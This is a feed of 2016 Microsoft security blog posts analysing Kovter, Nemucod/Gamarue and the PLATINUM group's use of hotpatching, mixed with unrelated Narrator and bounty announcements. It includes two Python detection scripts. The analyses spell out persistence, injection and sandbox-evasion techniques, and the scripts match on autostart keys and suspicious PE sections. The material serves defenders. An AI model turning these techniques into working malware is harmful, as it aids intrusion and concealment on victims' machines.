  • Attempting to lock your browser and demanding payment as ransomware. You can close your browser or restart your computer to escape. This type of ransomware hasn’t really locked your PC.
  • Loading an exploit kit to attack your browser or browser plugin.
  • Claiming your browser, Adobe Flash Player, or Java is out of date and in need of an update. Often they will claim the update is required to view the website content or is needed for security reasons. Keeping these applications up-to-date is really important to keep your PC safe and secure from the latest vulnerabilities. However, you should never trust a website claiming to detect security problems on your PC. Instead, let these apps update themselves when they prompt you outside of your browser, or search for the official websites to install the missing components.

The recent Kovter malvertising attack falls into this last category, using a social engineering attack that states that your Adobe Flash is out of date and needs to be updated for security reasons.

Figure 1 below illustrates the Kovter infection chain used in this attack. Users visiting affected websites are redirected to fake websites impersonating the official Adobe Flash download page, which claim that your Flash Player is out of date; Trojan:Win32/Kovter is then automatically downloaded under the name “FlashPlayer.exe”.


Figure 1 – Kovter’s fake Adobe update malvertising infection chain


For this most recent campaign, we saw Kovter perpetrators redirecting to the following domains:


The domains from this campaign and previous campaigns commonly use the same domain registration information, and can be identified by:

Admin Email:

As soon as the malicious advertisement is displayed, users are redirected to the Kovter social engineering page hosted using HTTPS according to the following pattern:

https://<domain>/<random numbers>/<random hex>.html

For example:


By using HTTPS, the browser displays a ‘secure’ lock symbol, which wrongly adds to the user’s trust that the website is safe while at the same time preventing most network intrusion protection systems from inspecting the traffic and protecting the user. Endpoint antimalware solutions, such as Windows Defender, still protect the user, however. We were unable to confirm this because the servers had been taken down, but reports online suggest that trial COMODO SSL certificates were used to secure these connections in past Kovter campaigns.

When you visit the website, it automatically downloads Kovter as “FlashPlayer.exe”. It downloads from the same domains using a pattern such as:


Some example FlashPlayer.exe downloaded files for reference are as follows:

Sha1 Md5


These downloaded Kovter files were digitally signed by a trusted COMODO certificate under the company name “Itgms Ltd” as follows:

Comodo certificate


We notified COMODO of the code signing abuse by Kovter and they have since revoked this certificate. We suspect that the actors behind Kovter code-signed their fake Adobe Flash installer to increase the number of users who trust the downloaded file and decide to run it.

This is one of the largest cases of trusted code-signing by malware that we have seen: more than 350,000 unique machines running our security products were protected.

Given that we haven’t seen this certificate used for non-Kovter files, we believe the private key for the certificate was not stolen but rather issued to the malware authors directly. The domain used by the contact email address to acquire the certificate ( was registered November 10, 2015, just eight days before the certificate was acquired, but we did not observe this certificate signing files in the wild until this campaign ramped up a few weeks ago on April 21, 2016. To date, we have seen this certificate only being used to sign Kovter files.

The sheer volume of PCs encountering Kovter during this attack, along with the attackers appearing to have been directly issued their own digital certificates, is a cause for concern. Fortunately for us, the digital signature actually helped us identify Kovter files and protect you better, since we can uniquely identify and remove every file signed by this certificate. We will continue to monitor Kovter to keep you protected.


MSRT coverage

As part of our ongoing effort to provide better malware protection, the May release of the Microsoft Malicious Software Removal Tool (MSRT) includes detections for Kovter and Locky. Locky is a family of ransomware which uses infected Microsoft Office files to download the ransomware onto your PC.

By adding Kovter and Locky detections to MSRT we hope to have a bigger impact by reaching more affected machines and helping remove these threats. However, as with all threats, prevention is the best protection.


Kovter Installation

On top of the recent Kovter Adobe Flash malvertising attack, we have also seen this trojan arrive as an attachment to spam emails. We have seen this malware being downloaded by TrojanDownloader:JS/Nemucod, for example:

  • Sha1: 36e81f09d2e1f9440433b080b056d3437a99a8e1
  • Md5: 74dccbc97e6bffbf05ee269adeaac7f8

When Kovter is installed, the malware drops its main payload as data in a registry key (HKCU\software\<random_chars> or HKLM\software\<random_chars>). For example, we have seen it drop the payload into the following registry keys:

  • hklm\software\oziyns8
  • hklm\software\2pxhqtn
  • hkcu\software\mpcjbe00f
  • hkcu\software\fxzozieg

Kovter then installs JavaScript as a run key registry value using paths that automatically run on startup such as:

  • hklm\software\microsoft\windows\currentversion\run
  • hklm\software\microsoft\windows\currentversion\policies\explorer\run
  • hklm\software\wow6432node\microsoft\windows\currentversion\run
  • hklm\software\wow6432node\microsoft\windows\currentversion\policies\explorer\run
  • hkcu\software\microsoft\windows\currentversion\run
  • hkcu\software\classes\<random_chars>\shell\open\command

The dropped JavaScript registry value usually has the format “mshta javascript: <malicious Kovter JavaScript>”. When executed at startup, this JavaScript loads the Kovter payload data from the registry key into memory and executes it.

Once executing in memory, the malware also injects itself into legitimate processes including:

  • regsvr32.exe
  • svchost.exe
  • iexplorer.exe
  • explorer.exe

After installation, the malware removes the original installer from the disk, leaving only the registry keys that contain the malware.
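The persistence layout just described (a payload blob stored directly under HKCU\Software\<random_chars> or HKLM\Software\<random_chars>, plus an “mshta javascript:” autostart value under one of the listed Run keys or a Classes\<random_chars>\shell\open\command key) can be checked offline against a registry export taken from a suspect machine. The following Python script is an added example, not code from the original post or from MSRT: it parses `reg export` output and flags values matching those two indicators. The .reg text is constructed; the value names k3j9x, a1 and the key name f7qz2 are made up (fxzozieg is one of the key names from the post), `PLACEHOLDER_SCRIPT` stands in for the script text, and the 16-byte blob threshold is an assumption sized for the toy sample.

```python
r"""Added example: offline triage of a .reg export for the Kovter persistence layout.

Not code from the original post. It looks for the two indicators the post
describes: an "mshta javascript:" autostart value, and a binary payload blob
stored directly under HKCU\Software\<random> or HKLM\Software\<random>.
"""
import re

# Autostart key paths listed in the post (hive stripped, lower-case).
AUTOSTART_KEYS = {
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\policies\explorer\run",
    r"software\wow6432node\microsoft\windows\currentversion\run",
    r"software\wow6432node\microsoft\windows\currentversion\policies\explorer\run",
}
SHELL_OPEN_CMD = re.compile(r"^hk(lm|cu)\\software\\classes\\[^\\]+\\shell\\open\\command$")
MSHTA_JS = re.compile(r'^\s*"?mshta(\.exe)?"?\s+javascript:', re.IGNORECASE)
PAYLOAD_KEY = re.compile(r"^software\\[^\\]+$")
PAYLOAD_MIN_BYTES = 16  # assumed threshold for the toy sample; real payloads are far larger
HIVES = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu", "hkey_users": "hku"}


def normalize_key(key: str) -> str:
    """Lower-case a key path and abbreviate its hive (HKEY_CURRENT_USER -> hkcu)."""
    hive, sep, rest = key.partition("\\")
    return HIVES.get(hive.lower(), hive.lower()) + sep + rest.lower()


def decode_data(data: str):
    """Decode REG_SZ (quoted, backslash-escaped) and hex: binary data; keep other types as text."""
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if data.lower().startswith("hex"):
        return bytes(int(h, 16) for h in data.split(":", 1)[1].split(",") if h.strip())
    return data


def parse_reg_export(text: str):
    """Return [(key, value_name, data), ...] from 'reg export' output, joining continuation lines."""
    entries, key, lines, i = [], None, text.splitlines(), 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = normalize_key(line[1:-1])
            continue
        if key is None or "=" not in line:
            continue
        while line.endswith("\\") and i < len(lines):  # hex values wrap with a trailing backslash
            line = line[:-1] + lines[i].strip()
            i += 1
        name, _, data = line.partition("=")
        entries.append((key, "(default)" if name == "@" else name.strip('"'), decode_data(data)))
    return entries


def find_kovter_indicators(entries):
    """Return findings for autostart mshta/javascript values and registry-resident payload blobs."""
    findings = []
    for key, name, data in entries:
        _hive, _, path = key.partition("\\")
        if isinstance(data, str):
            if (path in AUTOSTART_KEYS or SHELL_OPEN_CMD.match(key)) and MSHTA_JS.match(data):
                findings.append(f"mshta javascript: autostart value {name!r} under {key}")
        elif isinstance(data, bytes) and PAYLOAD_KEY.match(path) and len(data) >= PAYLOAD_MIN_BYTES:
            # Noisy on its own (vendors store binary settings here too); weigh it with the hit above.
            findings.append(f"{len(data)}-byte binary blob {name!r} under {key}")
    return findings


# Constructed .reg export: one benign Run value, then the three Kovter-style artefacts.
# Names other than fxzozieg (from the post) are made up; PLACEHOLDER_SCRIPT stands in for script text.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"k3j9x"="mshta javascript:PLACEHOLDER_SCRIPT"

[HKEY_CURRENT_USER\Software\Classes\f7qz2\shell\open\command]
@="\"mshta.exe\" javascript:PLACEHOLDER_SCRIPT"

[HKEY_CURRENT_USER\Software\fxzozieg]
"a1"=hex:de,ad,be,ef,00,11,22,33,44,55,66,77,88,99,aa,bb,cc,dd,ee,ff,01,02,\
  03,04,05,06,07,08,09,0a
'''


def demo():
    return find_kovter_indicators(parse_reg_export(SAMPLE_REG_EXPORT))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The benign OneDrive value is left alone because the check keys on the `mshta … javascript:` prefix in an autostart location rather than on the presence of a Run value; the blob heuristic is deliberately reported separately so an analyst can treat it as corroboration rather than as a verdict.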



Lowers Internet security settings

It modifies the following registry entries to lower your Internet security settings:

  • In subkey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Sets value: “1400” With data: “0”
  • In subkey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Sets value: “1400” With data: “0”

Sends your personal information to a remote server

We have seen this malware send information about your PC to the attacker, including:

  • Antivirus software you are using
  • Date and time zone
  • GUID
  • Language
  • Operating system

It can also detect some specific tools on your PC and send that information back to the attacker:

  • JoeBox
  • QEmuVirtualPC
  • Sandboxie
  • SunbeltSandboxie
  • VirtualBox
  • VirtualPC
  • VMWare
  • Wireshark


This threat can silently visit websites without your consent to perform click-fraud by clicking on advertisements. It does so by running several instances of Internet Explorer in the background.

Download updates or other malware

This threat can download and run files. Kovter uses this capability to update itself to a new version. This update capability has been used recently to install other malware such as:




Figure 2 – Kovter’s prevalence for the past two months shows a spike in the month of April



Figure 3 – Kovter’s geographic distribution shows that the majority of the affected machines are in the United States


Mitigation and prevention

To help stay protected from Kovter, Locky and other threats, use an up-to-date Windows Defender for Windows 10 as your antimalware scanner, and ensure that MAPS has been enabled.

Though trojans have been a permanent fixture in the malware ecosystem, there’s still something that you or your administrators can proactively do:


Geoff McDonald and Duc Nguyen


May 2016 security update release, 10 May 2016 17:00:52 +0000 we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released.

More information about this month’s security updates and advisories can be found in the Security TechNet Library.

MSRC team

Further Details on the Coming Improvements to Narrator in Windows 10, 09 May 2016 20:45:54 +0000

The following blog post was written by Kelly Ford. He is Senior Program Manager on the Windows Accessibility team.

We recently blogged about some improvements to Narrator in Windows 10.  Now that some of those changes are available to Windows Insiders, we wanted to provide you with specifics on using some of the updated features in Narrator. These changes are currently best experienced in Windows Insider Preview Build 14328 or newer.  Some of the updated features we will cover include:

  • Scan Mode
  • Verbose modes
  • Punctuation modes
  • Faster text to speech Voices
  • AutoSuggest Announcements

Scan Mode

We’ve introduced a new navigation mode to Narrator called Scan mode.  When this mode is on, you can use the UP and DOWN ARROW keys to move through applications and web content.  Scan Mode is turned on with a press of CAPS LOCK and SPACE.  While you are in Scan mode you can press SPACE to activate an item of interest, such as following a link on a web page or pressing a button in an app. Scan Mode is turned off with another press of CAPS LOCK+SPACE.
Scan Mode is also intended to make navigating tables easier and supports common keys found in other screen readers for table navigation.  Use CTRL+ALT and ARROW KEYS when in a table to navigate by cells in a row or column.

Scan Mode has several additional hotkeys, as seen in the below table, that you can use to move through applications and content as well.

  • CAPS LOCK+SPACE: Toggle Scan Mode
  • SPACE: Activate the item with focus in Scan Mode
  • ENTER: Do a secondary action on the item with focus when supported
  • H: Move to the next heading
  • SHIFT+H: Move to the previous heading
  • ALT+DOWN ARROW: Move to the next heading
  • ALT+UP ARROW: Move to the previous heading
  • P: Move to the next paragraph
  • SHIFT+P: Move to the previous paragraph
  • CTRL+DOWN ARROW: Move to the next paragraph
  • CTRL+UP ARROW: Move to the previous paragraph
  • K: Move to the next link
  • SHIFT+K: Move to the previous link
  • D: Next landmark
  • SHIFT+D: Previous landmark
  • T: Move to next table
  • SHIFT+T: Move to previous table
  • CTRL+ALT+LEFT ARROW: Move left a cell in a table
  • CTRL+ALT+RIGHT ARROW: Move right a cell in a table
  • CTRL+ALT+DOWN ARROW: Move down a cell in a table
  • CTRL+ALT+UP ARROW: Move up a cell in a table


Verbose modes

Narrator now supports six levels of verbosity for giving you more details about the characteristics of text.  For example, at what we call Verbose mode 0 (zero), you will hear just the text.  At verbose mode 1, you will hear if the text is a heading.  At other verbose levels, you will get varying indications of other text properties, like text color or formatting as an example.  You can quickly cycle through the different levels for this feature by pressing CAPS LOCK+A.  Alternatively, you can move forward through the verbosity levels with CAPS LOCK+CTRL+(PLUS), or move through them in reverse with CAPS LOCK+CTRL+(MINUS).

Here is a bit more detail on what’s communicated at the different Narrator Verbose levels.

  • Zero (Text only): Hear text and that is it.
  • One (Header and Errors): Help with some basics on the web and daily typing errors in emails. Contains information such as heading levels, and errors in documents such as spelling, grammar, and others.
  • Two (Basic Formatting): Designed based on commonly found information in emails and webpages. Contains bullet styles, font weight (bold), underline, italics, subscript, superscript, and color.
  • Three (Other Annotations): Footer, header, and unknown.
  • Four (Extended Formatting): Font name, font size, other list styles.
  • Five (Layout and animation information): Paragraph starts with an indent, type of animation, and other such data.

Punctuation modes

Narrator now supports the ability to give you more control over how much punctuation you hear when reading text.  CAPS LOCK+ALT+(PLUS) and CAPS LOCK+ALT+(MINUS) cycle through the settings for punctuation.  The settings for punctuation include none, some, most, all and math along with default.

Faster Text to Speech

We’ve added three new voices to Narrator that offer a much faster top rate of speech.  Our current voices average a maximum of roughly 400 words per minute.  The three new voices average nearly twice that at approximately 800 words per minute.  You can select one of these new voices by pressing ALT+TAB when Narrator is running and then choosing voice settings.  Select either the David Mobile, Zira Mobile or Mark Mobile voices to get these faster speech rates.  As a reminder, CAPS LOCK+(PLUS) increases Narrator’s speaking rate and CAPS LOCK+(MINUS) decreases the rate of speech.

AutoSuggest Announcements

Many applications in Windows 10 offer what we call AutoSuggestions as you enter information.  For example, when you start entering a search term in the Cortana search box you will get suggestions based on what you are entering.  With Narrator you will now get a verbal hint with an audio indication when these suggestions are available.  Use CAPS LOCK+DOWN ARROW on the keyboard, or a flick down if you are using touch, to change to the list of suggestions.  Use CAPS LOCK+RIGHT and LEFT ARROWS on a keyboard, or flicks right and left, to move through the list of suggestions.  Use CAPS LOCK+ENTER or a double tap to pick the suggestion you want.  You can alternatively use the DOWN ARROW to move through suggestions and simply press ENTER to select the one you want to use.

New to Narrator

Narrator is a screen reading program that can be used by people who are blind to access the computer, Windows phone or Xbox.  If you are new to Narrator, the program can be launched by pressing the Windows key and Enter simultaneously on the keyboard.  You can launch Narrator on a tablet or phone by pressing the Volume up and Start button.

Giving Us Feedback

We’d love to have your feedback on these features and your experiences with Narrator.  You can use Narrator’s own feedback command of pressing CAPS LOCK+E twice to enter comments about your experiences and send us feedback. Pressing CAPS LOCK+E once will let us know you are unhappy about what you are currently doing.  You can also leave us comments on our Microsoft Accessibility User Voice site.  And don’t forget, if you are using Narrator or other assistive technology, you can get technical support from the Microsoft Disability Answer Desk.

Gamarue, Nemucod, and JavaScript, 09 May 2016 16:00:20 +0000 JavaScript is now being used largely to download malware because the code is easy to obfuscate and small in size. Most recently, one of the most prevalent JavaScript malware families spreading other malware is Nemucod.

This JavaScript trojan, which arrives through spam email, downloads additional malware (such as Win32/Tescrypt and Win32/Crowti – two pervasive ransomware trojans that have been doing the rounds for a few years[1] – and Win32/Fareit) and installs it on the victim’s system.

Recently, however, we’ve seen another version of Nemucod distributing Gamarue malware to users.

Gamarue, also known as “Andromeda bot”, has been known to arrive through exploit kits, other executable malware downloaders (including Win32/Dofoil and Win32/Beebone), removable drives, and through that old stand-by: spam campaigns.

The shift to a JavaScript-obfuscated downloader might be an attempt by the malware authors to evade the increasing detection capabilities and sophistication in antimalware products.

A quick look into the obfuscated JavaScript code shows us that, aside from the encrypted strings, it uses variables with random names to hide its real code.


Figure 1: Obfuscated code


The decrypted code is shown in the following image:


Figure 2: De-obfuscated code


Nemucod is known to have different hashes for each variant. For this one particular hash, since the detection was written in early April 2016, it reached a total of 982 distinct machines with 4,192 reports – which indicates the number of Gamarue installations that could have occurred if it had not been detected.


Figure 3:  Nemucod detection rate


Gamarue has been observed stealing vital information from your PC. It can also accept commands from a command and control (C&C) server. Depending on the commands received, a malicious hacker can perform various actions on the machine. See our family description of Win32/Gamarue for more information.



Nemucod impact

Since the start of 2016, Nemucod has risen in prevalence.


Figure 4:  Rising Nemucod prevalence trend shows that it peaked in April


For the top 10 countries for Nemucod detections, the US takes a third, followed by Italy and Japan. The spread of infections is quite widespread across the globe.


Figure 5: Majority of the Nemucod infections are seen in the United States

Overall, however, it still remains relatively low, especially when compared to Gamarue.


Gamarue impact

Unlike Nemucod, Gamarue detections started high and have remained high since late last year. Overall, numbers have dropped a small amount since the start of 2016. Interestingly, there are large troughs during every weekend, with a return to higher numbers on Monday. This can indicate that Gamarue is especially pervasive either in enterprises, or in spam email campaigns.


Figure 6: The Gamarue infection trend shows a steady pattern


For Gamarue, the top 10 countries see distribution largely through India, Asia, Mexico, and Pakistan.


Figure 7: The majority of Gamarue infections hit third-world countries


Mitigation and prevention

To help stay protected from Nemucod, Gamarue, and other threats, use Windows Defender for Windows 10, or other up-to-date real-time product as your antimalware scanner.

Use advanced threat and cloud protection

You can boost your protection by using Office 365 Advanced Threat Protection and enabling Microsoft Active Protection Service (MAPS).

Office 365 helps by blocking dangerous email threats; see Overview of Advanced Threat Protection in Exchange: new tools to stop unknown attacks, for details.

MAPS uses cloud protection to help guard against the latest malware threats. You should check if MAPS is enabled on your PC.

Some additional preventive measures that you or your administrators can proactively do:



[1] We’ve published a number of blogs about Crowti, including:

It was also featured in the July 2015 version of the Malicious Software Removal Tool (MSRT):


Donna Sibangan




Accessibility and the Windows 10 Free Upgrade, 06 May 2016 19:00:10 +0000 As you may have heard, the free Windows 10 upgrade offer for customers running Windows 7 or Windows 8.1 is set to end on July 29, but we want to clarify that this deadline will *not* apply to customers who use assistive technologies. We are continuing to deliver on our previously-shared vision for accessibility for Windows 10 and we are committed to ensuring that users of assistive technologies have the opportunity to upgrade to Windows 10 for free as we do so.

Stay tuned for more details on how you can take advantage of the free offer. In the meantime, you can read more about our accessibility roadmap for Windows 10 on the Microsoft on the Issues blog.

Microsoft Bounty Programs Expansion – Nano Server Technical Preview Bounty, 30 Apr 2016 00:00:23 +0000 is pleased to announce another expansion of the Microsoft Bounty Programs. Today we begin a bounty for the Nano Server installation option of Windows Server 2016 Technical Preview 5. Please visit to find more details.

Nano Server is a remotely administered, headless installation option of the server operating system. In this first release, the Nano Server deployment is focused on two scenarios:

  1. As the host for compute and/or storage clusters
  2. As a lightweight OS in a VM or container for “born in the cloud” applications.

In summary:

  • All binaries included in the Nano Server configuration of Windows Server 2016 Technical Preview 5 and any subsequent Betas, Technical Previews or Release Candidates during the bounty period
  • Hyper-V escapes and Mitigation Bypass vulnerabilities will be evaluated against the Mitigation Bypass Bounty instead
  • The bounty will run April 29, 2016 – July 29, 2016
  • Bounty payouts will range from $500 USD to $15,000 USD

These additions to the Microsoft Bounty Program will be part of the rigorous security programs at Microsoft. Bounties complement the Microsoft Security Development Lifecycle (SDL), Operational Security Assurance (OSA) framework, regular penetration testing of our products and services, and Security and Compliance Accreditations by third party audits.

As always, the most up-to-date information about the Microsoft Bounty Programs can be found at and in the associated terms and FAQs.

Changes to Security Update Links, 29 Apr 2016 22:17:32 +0000 Security updates have historically been published on both the Microsoft Download Center and the Microsoft Update Catalog, and Security Bulletins have linked directly to update packages on the Microsoft Download Center. Some updates will no longer be available from the Microsoft Download Center.

Security bulletins will continue to link directly to the updates, but will point to the packages on the Microsoft Update Catalog for updates not available on the Microsoft Download Center. Customers that use tools linking to the Microsoft Download Center should follow the links provided in the Security Bulletins or search directly on the Microsoft Update Catalog.

For tips on searching the Microsoft Update Catalog, visit the frequently asked questions page.

Digging deep for PLATINUM, 26 Apr 2016 19:00:41 +0000 This blog introduces our latest report from the Windows Defender Advanced Threat Hunting team. You can read the full report at:

There is no shortage of headlines about cybercriminals launching large-scale attacks against organizations. For us, the activity groups that pose the most danger are the ones who selectively target organizations and desire to stay undetected, protect their investment, and maximize their ROI. That’s what motivated us – the Windows Defender Advanced Threat Hunting team, known as hunters – when we recently discovered a novel technique being used by one such activity group.

We have code named this group PLATINUM, following our internal practice of assigning rogue actors chemical element names. Based on our investigations, we know PLATINUM has been active since 2009 and primarily targets governmental organizations, defense institutes, intelligence agencies, and telecommunication providers in South and Southeast Asia. The group has gone to great lengths to develop covert techniques that allow them to conduct cyber-espionage campaigns for years without being detected.

Uncovering these kinds of techniques is true detective work, and finding them in the wild is a challenge, but with the wealth of anonymized information we can utilize from over 1 billion Windows devices, a broad spectrum of services, Microsoft’s intelligent security graph as well as advanced analytics and machine algorithms to surface suspicious behaviors, Microsoft is in the best position to do so.

Digging up the nugget

Through our advanced and persistent hunting, we discovered PLATINUM is using hotpatching as a technique to attempt to cloak a backdoor they use. Using hotpatching in the malicious context has been theorized [1], [2], but has not been observed in the wild before. Finding such techniques is a focus of the Microsoft APT hunter team, and we want to provide some brief insights on how the team dug up this PLATINUM “nugget”.

In the first part of this methodology, a hunter carves out some rough data sets from existing information and data that can be further analyzed. This could be based on rough heuristics, such as looking for files with high entropy, that were first observed recently, and that are confined to a geographic region that fits the profile of the activity group being investigated.

Carving the data still yields large data sets that can’t be manually analyzed, and advanced threat analytics can help in sorting through the data for meaningful information in the second step. Graph inferences through the Microsoft intelligent security graph can bubble pieces of information to the top of the queue for a hunter to choose from. In the PLATINUM investigation, we identified 31 files.

Lastly, the hunter works directly with the resulting set. During this stage of the PLATINUM investigation, a hunter found a file with an unusual string (“.hotp1”). The hunter’s experience and intuition drove him to dig deeper. In this case, that further investigation led us to the malicious use of hotpatching by this activity group and the “nugget” was uncovered.

Deconstructing the attack

So what is hotpatching? Hotpatching is a previously supported OS feature for installing updates without having to reboot or restart a process. It requires administrator-level permissions, and at a high level, a hotpatcher can transparently apply patches to executables and DLLs in actively running processes.

Using hotpatching in a malicious context is a technique that can be used to avoid being detected, as many antimalware solutions monitor non-system processes for regular injection methods, such as CreateRemoteThread. Hotpatching originally shipped with Windows Server 2003 and was used to ship 10 patches to Windows Server 2003. Windows 10, our most secure operating system ever, is not susceptible to this and many other techniques and attack vectors.

What this means in practical terms is that PLATINUM was able to abuse this feature to hide their backdoor from the behavioral sensors of many host security products. We first observed a sample employing the hotpatching technique on a machine in Malaysia. This allowed PLATINUM to gain persistent access to the networks of companies it targeted and victimized over a long period without being detected.

Thwarting the bad guys

The Microsoft APT hunter team actively tracks activity groups like PLATINUM. We proactively identify these groups and the techniques they use and work to address vulnerabilities and implement security mitigations. The team builds detections and threat intelligence that are utilized by many of our products and services. Beta users of Windows Defender ATP can take advantage of this additional layer of protection and intelligence for a broad set of activity groups.

We’ve included a more technical exploration of  our research and detection of the hotpatching technique in the remainder of this blog.

You can also see a closer look at the PLATINUM activity group in our report PLATINUM: Targeted attacks in South and Southeast Asia. Windows Defender Advanced Threat Protection beta and preview users can also find the report, along with other APT activity group reports, in the Windows Defender ATP portal.

We continue to dig for PLATINUM.

The Windows Defender Advanced Threat Hunting Team

Hotpatching – a case study

We first observed the sample (Sample1) that is capable of utilizing hotpatching on a machine in Malaysia (which matches the general target profile of PLATINUM) on January 28, 2016. The portable executable (PE) timestamp, which can be arbitrarily set by the adversary, dates back to August 9, 2015, while the unpacked version contains a PE timestamp for November 26, 2015.

It is a DLL that runs as a service and serves as an injector component of a backdoor. Interestingly, this sample not only supported the hotpatching technique described in this post, but was able to apply more common code-injection techniques, including the following, into common Windows processes (primarily targeting winlogon.exe, lsass.exe and svchost.exe):

  • CreateRemoteThread
  • NtQueueApcThread to run an APC in a thread in the target process
  • RtlCreateUserThread
  • NtCreateThreadEx

Hotpatching technique

For hotpatching, the sample goes through the following steps:

  1. It patches the loader with a proper hotpatch to treat injected DLLs with execute page permissions. This step is required for DLLs loaded from memory (in an attempt to further conceal the malicious code).
  2. The backdoor is injected into svchost using the hotpatch API.

Patching the loader is done by creating a section named “\knowndlls\mstbl.dll”. This DLL does not reside on-disk, but is rather treated as a cached DLL by the session manager.

It then proceeds to write a PE file within that section. The PE file will have one section (“.hotp1”) with the hotpatch header structure. This structure contains all the information necessary to perform the patching of the function “ntdll!LdrpMapViewOfSection” used by the loader, such that the loader will treat created sections as PAGE_EXECUTE_READWRITE instead of PAGE_READWRITE. The patch is successfully applied by invoking NtSetSystemInformation.


Figure 1: The malware builds the information describing the first patch



Figure 2: The highlighted “push 4” is patched to “push 0x40”, meaning that the parameter for the following API call NtMapViewOfSection is changed from PAGE_READWRITE to PAGE_EXECUTE_READWRITE.

Now that the memory permission issue has been solved, the injector can proceed with injecting the malicious DLL into svchost. Again, it creates a (now executable) section named “knowndlls\fgrps.dll” and invokes NtSetSystemInformation, causing the final payload to be loaded and executed within the target process (svchost).
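Two of the hunting heuristics described in this post, carving for high-entropy files (under “Digging up the nugget”) and spotting the unusual “.hotp1” section name that surfaced Sample1, can be reproduced as a small section-table triage. The Python below is an added example, not code from the report or from the Windows Defender ATP tooling: it builds a minimal PE32 image in memory, walks its section table with the standard library, and reports sections whose names fall outside a conventional allow-list or whose bytes have near-maximal entropy. The image and its section contents are constructed (the “.hotp1” bytes are a stand-in, not a real hotpatch header), and the allow-list and the 7.0 bits/byte threshold are assumptions.

```python
"""Added example: hunt a PE section table for unusual names and high entropy.

Not code from the PLATINUM report; the PE image below is constructed in
memory so the example runs offline without any real sample.
"""
import math
import struct

# Section names that common toolchains emit (assumed allow-list, not exhaustive).
COMMON_SECTION_NAMES = {
    b".text", b".data", b".rdata", b".bss", b".idata", b".edata",
    b".pdata", b".rsrc", b".reloc", b".tls", b".CRT",
}
ENTROPY_THRESHOLD = 7.0  # bits per byte; packed or encrypted data approaches 8.0 (assumed cut-off)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Return [(name, raw_bytes), ...] from the section table of a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4  # IMAGE_FILE_HEADER starts right after the signature
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]   # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]      # SizeOfOptionalHeader
    table = coff + 20 + opt_size                                # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        # Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + i * 40)
        sections.append((name.rstrip(b"\0"), pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def triage(pe: bytes):
    """Return human-readable findings for sections a hunter would look at first."""
    findings = []
    for name, data in parse_sections(pe):
        label = name.decode("ascii", "replace")
        if name not in COMMON_SECTION_NAMES:
            findings.append(f"unusual section name {label}")
        ent = shannon_entropy(data)
        if ent >= ENTROPY_THRESHOLD:
            findings.append(f"high entropy {ent:.2f} bits/byte in section {label}")
    return findings


def build_sample_pe(sections):
    """Construct a minimal PE32 image carrying the given (name, data) sections.

    Test input only: the optional header is zero-filled apart from its magic,
    so the image is parseable but not loadable.
    """
    opt_size = 224                                   # size of IMAGE_OPTIONAL_HEADER32
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))       # e_lfanew points right after the DOS header
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt_hdr = b"\x0b\x01" + bytes(opt_size - 2)      # PE32 magic, rest zeroed
    headers_end = len(dos) + 4 + 20 + opt_size + 40 * len(sections)
    raw_base = (headers_end + 0x1FF) & ~0x1FF        # 512-byte file alignment
    table, payload = [], bytearray()
    for idx, (name, data) in enumerate(sections):
        table.append(struct.pack("<8sIIIIIIHHI", name, len(data), 0x1000 * (idx + 1), len(data),
                                 raw_base + len(payload), 0, 0, 0, 0, 0x60000020))
        payload += data
    image = bytearray(dos) + b"PE\0\0" + file_hdr + opt_hdr + b"".join(table)
    image += bytes(raw_base - len(image)) + payload
    return bytes(image)


# Constructed sections: ordinary code bytes, a packed-looking blob, and a stand-in for the
# ".hotp1" hotpatch header section the report describes (its contents here are made up).
SAMPLE_SECTIONS = [
    (b".text", b"\x55\x8b\xec\x83\xec\x10" * 64),
    (b".data", bytes(range(256)) * 4),
    (b".hotp1", struct.pack("<IIII", 1, 0, 0x1000, 0x40)),
]


def demo():
    return triage(build_sample_pe(SAMPLE_SECTIONS))


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Neither signal is a verdict on its own: packers and legitimate resource blobs produce high-entropy sections, and custom section names are common in hand-built binaries. The value, as in the post’s second and third steps, is in shrinking a large carved set to a queue a hunter can read through.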

Trying to hide the payload using hotpatching also falls in line with the last functional insights we have on the sample. It seems to have an expiry date of January 15, 2017 – at that point in time, the DLL will no longer perform the injection, but rather execute another PLATINUM implant:

C:\program files\Windows Journal\Templates\Cpl\jnwmon.exe –ua

This implant may be related to an uninstall routine. Note that we observed the sample last on the machine on September 3, 2015, which may indicate PLATINUM pulled the trigger earlier.

